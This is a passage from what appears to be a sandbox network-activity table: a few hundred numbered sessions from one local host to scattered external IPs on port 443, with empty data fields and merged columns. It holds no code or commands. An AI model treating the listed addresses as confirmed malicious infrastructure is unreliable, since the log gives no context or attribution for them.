                                                        12332192.168.2.1453104143.185.48.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12333192.168.2.144657281.126.62.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12334192.168.2.143595045.127.152.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12335192.168.2.14431265.155.171.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12336192.168.2.1455246161.184.43.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12337192.168.2.144699493.150.209.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12338192.168.2.143615438.78.36.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12339192.168.2.14598868.5.186.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12340192.168.2.144149852.19.242.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12341192.168.2.1439482133.136.25.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12342192.168.2.143936850.224.125.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12343192.168.2.144483460.36.207.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12344192.168.2.144012888.162.164.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12345192.168.2.145154273.194.105.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12346192.168.2.143430012.74.86.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12347192.168.2.145832079.8.111.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12348192.168.2.1447304162.190.105.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12349192.168.2.144801441.26.175.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12350192.168.2.1439308129.20.78.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12351192.168.2.1450408120.101.31.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12352192.168.2.144046482.114.66.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12353192.168.2.1460626178.79.214.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12354192.168.2.1433856193.251.145.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12355192.168.2.1455890172.87.131.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12356192.168.2.1437326177.33.243.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12357192.168.2.1446068125.12.26.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12358192.168.2.143932864.197.38.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12359192.168.2.1449120132.231.43.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12360192.168.2.1454250124.30.43.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12361192.168.2.1453736186.167.120.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12362192.168.2.1448484203.113.161.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12363192.168.2.1453418135.146.47.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12364192.168.2.144754084.159.232.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12365192.168.2.143564646.69.145.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12366192.168.2.1433454185.2.47.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12367192.168.2.143664468.171.35.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12368192.168.2.1441994220.203.72.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12369192.168.2.1450594121.101.2.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12370192.168.2.1443596193.14.112.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12371192.168.2.1455640153.249.190.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12372192.168.2.1451922192.3.96.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12373192.168.2.144932425.253.27.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12374192.168.2.1450738202.58.118.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12375192.168.2.145286283.148.72.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12376192.168.2.1437964208.149.65.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12377192.168.2.1435846171.108.74.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12378192.168.2.1459644155.80.37.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12379192.168.2.1445324105.185.32.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12380192.168.2.145260843.145.164.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12381192.168.2.143650219.205.143.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12382192.168.2.143580680.251.61.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12383192.168.2.1444858107.29.169.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12384192.168.2.143994453.120.22.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12385192.168.2.1441650152.210.40.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12386192.168.2.1440772107.196.55.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12387192.168.2.145665862.198.229.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12388192.168.2.145189054.215.57.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12389192.168.2.144714292.217.55.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12390192.168.2.1458938139.167.43.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12391192.168.2.1438670107.172.65.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12392192.168.2.143700078.7.140.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12393192.168.2.1433924151.132.186.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12394192.168.2.143876413.137.243.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12395192.168.2.145849470.23.7.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12396192.168.2.1452650217.255.125.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12397192.168.2.144069041.124.254.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12398192.168.2.1444810198.132.14.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12399192.168.2.1439598125.52.115.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12400192.168.2.144855459.179.226.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12401192.168.2.144611832.213.7.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12402192.168.2.1442034204.43.0.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12403192.168.2.1459224166.84.172.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12404192.168.2.1441670217.36.114.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12405192.168.2.145088871.234.231.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12406192.168.2.144108068.135.14.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12407192.168.2.143671295.185.204.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12408192.168.2.1440300187.158.241.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12409192.168.2.1454524213.84.130.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12410192.168.2.144641623.203.96.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12411192.168.2.1450872101.147.37.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12412192.168.2.1440708184.234.114.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12413192.168.2.1460522209.163.98.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12414192.168.2.1451084177.23.199.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12415192.168.2.144694424.27.140.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12416192.168.2.1444218174.198.31.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12417192.168.2.1439310106.199.17.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12418192.168.2.1456804150.66.8.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12419192.168.2.144458679.140.134.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12420192.168.2.1447308134.50.120.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12421192.168.2.1456332213.228.52.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12422192.168.2.1439092117.3.238.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12423192.168.2.144772241.166.107.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12424192.168.2.1450156122.58.248.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12425192.168.2.144956272.234.54.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12426192.168.2.1454608163.79.142.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12427192.168.2.1459968204.252.80.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12428192.168.2.1435746125.53.165.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12429192.168.2.145944860.101.114.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12430192.168.2.144664669.9.136.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12431192.168.2.143462666.60.77.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12432192.168.2.143319636.220.132.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12433192.168.2.1452072195.160.246.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12434192.168.2.143277435.220.9.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12435192.168.2.1447410217.168.255.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12436192.168.2.1452446193.26.194.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12437192.168.2.145261243.147.248.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12438192.168.2.144021823.223.47.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12439192.168.2.1460216132.232.99.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12440192.168.2.1438136111.229.134.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12441192.168.2.143318473.86.218.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12442192.168.2.1447590166.51.155.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12443192.168.2.1455504198.233.219.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12444192.168.2.144425035.189.187.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12445192.168.2.145652267.11.183.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12446192.168.2.144608088.12.210.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12447192.168.2.143634040.76.154.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12448192.168.2.1442558195.190.92.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12449192.168.2.1451730101.138.88.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12450192.168.2.144433614.32.198.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12451192.168.2.1432808129.238.98.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12452192.168.2.1451992151.159.142.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12453192.168.2.144995060.80.98.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12454192.168.2.145866231.30.178.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12455192.168.2.1455188137.212.14.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12456192.168.2.1438116223.21.164.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12457192.168.2.1446834135.97.160.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12458192.168.2.145481287.52.81.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12459192.168.2.1452052129.182.61.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12460192.168.2.145445812.28.111.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12461192.168.2.1439346132.244.136.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12462192.168.2.1460694117.212.175.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12463192.168.2.144267435.213.1.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12464192.168.2.145801083.198.174.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12465192.168.2.1444830218.156.89.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12466192.168.2.1459068162.79.5.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12467192.168.2.1460838168.223.180.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12468192.168.2.144757465.12.149.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12469192.168.2.1450984172.211.220.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12470192.168.2.1454040182.72.227.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12471192.168.2.143472874.124.131.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12472192.168.2.145864261.177.82.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12473192.168.2.1449004123.34.84.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12474192.168.2.145817472.217.110.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12475192.168.2.1439406155.250.239.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12476192.168.2.144926277.211.235.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12477192.168.2.1454082188.170.245.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12478192.168.2.1443138100.254.158.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12479192.168.2.145367623.123.66.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12480192.168.2.1447990131.9.149.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12481192.168.2.1457910222.239.87.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12482192.168.2.1455780204.87.107.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12483192.168.2.1446276209.130.129.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12484192.168.2.1456468131.65.210.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12485192.168.2.1433298212.22.27.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12486192.168.2.143305275.132.18.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12487192.168.2.1452838117.218.200.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12488192.168.2.144682443.67.11.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12489192.168.2.143584470.20.156.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12490192.168.2.1453474200.152.7.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12491192.168.2.1445048165.6.242.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12492192.168.2.144213466.136.52.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12493192.168.2.144347812.192.192.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12494192.168.2.1440396178.189.254.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12495192.168.2.1456370203.180.85.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12496192.168.2.1447950190.96.188.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12497192.168.2.1449438115.34.140.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12498192.168.2.145762640.147.228.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12499192.168.2.1446866175.103.76.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12500192.168.2.1452552126.14.149.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12501192.168.2.143997283.38.82.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12502192.168.2.1454864184.233.237.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12503192.168.2.1453690125.25.236.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12504192.168.2.144455832.218.182.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12505192.168.2.1446102194.32.124.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12506192.168.2.145785045.196.48.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12507192.168.2.1457544199.106.236.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12508192.168.2.143470459.207.151.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12509192.168.2.143687242.189.136.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12510192.168.2.1460068107.139.135.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12511192.168.2.145303645.243.175.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12512192.168.2.145710039.54.43.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12513192.168.2.1440530154.63.235.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12514192.168.2.1454406103.0.6.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12515192.168.2.1434386200.211.73.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12516192.168.2.1451040210.6.124.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12517192.168.2.1434676108.98.178.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12518192.168.2.143964479.159.18.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12519192.168.2.145339065.7.18.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12520192.168.2.1438278183.227.140.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12521192.168.2.144106894.82.61.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12522192.168.2.144674836.205.154.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12523192.168.2.143324219.70.155.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12524192.168.2.1457992102.127.118.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12525192.168.2.1458282135.230.116.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12526192.168.2.1433594170.180.96.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12527192.168.2.1441856104.190.220.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12528192.168.2.1448598151.122.224.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12529192.168.2.1451144191.130.190.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12530192.168.2.145507681.115.236.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12531192.168.2.145465042.201.51.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12532192.168.2.1457690208.183.52.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12533192.168.2.144095620.9.244.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12534192.168.2.1450602144.31.142.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12535192.168.2.1458222202.95.62.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12536192.168.2.1443192168.197.226.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12537192.168.2.1433924126.119.157.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12538192.168.2.145784092.107.134.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12539192.168.2.1445214165.226.209.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12540192.168.2.1434670190.164.215.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12541192.168.2.1438512216.189.120.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12542192.168.2.144596074.174.236.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12543192.168.2.143424264.190.125.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12544192.168.2.1451934159.27.153.117443
